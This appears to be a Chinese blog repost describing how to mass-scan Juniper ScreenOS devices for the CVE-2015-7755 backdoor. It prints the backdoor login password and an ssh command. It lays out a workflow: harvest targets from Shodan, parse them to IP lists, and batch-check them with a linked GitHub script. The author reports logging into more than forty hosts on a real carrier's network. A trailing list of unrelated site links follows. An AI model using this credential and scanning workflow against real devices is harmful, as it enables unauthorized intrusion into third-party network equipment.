Juniper NetScreenOS 后门简易批量扫描
来源:互联网 发布:找什么样的老公 知乎 编辑:程序博客网 时间:2024/06/05 09:47
事件介绍
http://bobao.360.cn/news/detail/2514.html
受影响版本
6.2.0r15 到6.2.0r18
6.3.0r12 到 6.3.0r20
分析
https://community.rapid7.com /community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor
后门口令
ssh root@10.10.10.10
然后输入口令:<<< %s(un='%s') = %u
批量验证
使用shodan搜索,2000余台设备
导出结果文件,并使用脚本批量验证是否存在后门口令
以上所有文件在我的github可下载
https://github.com/Xyntax/exps/tree/master/juniperOS-backdoor
shodan导出格式选择xml
然后使用getIP脚本将导出数据解析成ip列表(存入/dict/ip),将后门口令存入(/dict/password)
使用python brute-ssh即可批量验证,结果存储在(/log/sshd)
注:脚本扫描结果未去重
对org为联通的500个ip进行扫描,结果发现有四十多台主机可以登入
修复
http://puluka.com/home/techtalknetworking/screenoscriticalsecurityissue2015.html
参考
http://zone.wooyun.org/content/24531
0 0
- Juniper NetScreenOS 后门简易批量扫描
- 利用Censys批量获取Juniper Netscreen后门
- 简易Telnet后门[经典]
- Juniper
- 完美扫描PHP特殊一句话后门
- Juniper Networks(瞻博网络)现后门:万能密码登录设备、可解密VPN流量
- 自动化批量扫描
- awvs 批量化扫描
- 批量扫描工具btscan
- 批量主机服务扫描
- 文件简易批量编号
- 简易扫描工具快速开发
- 后门
- 后门
- 后门
- 漏洞批量利用扫描框架
- 简易图片格式批量转换器 绿色
- 批量下载图片,简易脚本
- 高德地图根据经纬度画折线, 虚线(以两个点为例)
- Qt学习笔记--窗口部件(Widget)
- iOS通过URL打开Settings
- project euler 95
- C++多态之继承5-继承和访问说明符(public ,protected, private)
- Juniper NetScreenOS 后门简易批量扫描
- STM32之RCC
- 对嵌入式开发C语言结构体的一点总结
- 在C++中获取当前执行文件的路径
- 易于混淆的两个技术:Kerberos与Kubernetes辨析
- 超级记事本
- iOS8开发~UI布局(三)深入理解autolayout
- 第一篇,怎么增加SYN数据包的大小(syn flood攻击实验)
- 开机后台启动virtualbox虚拟机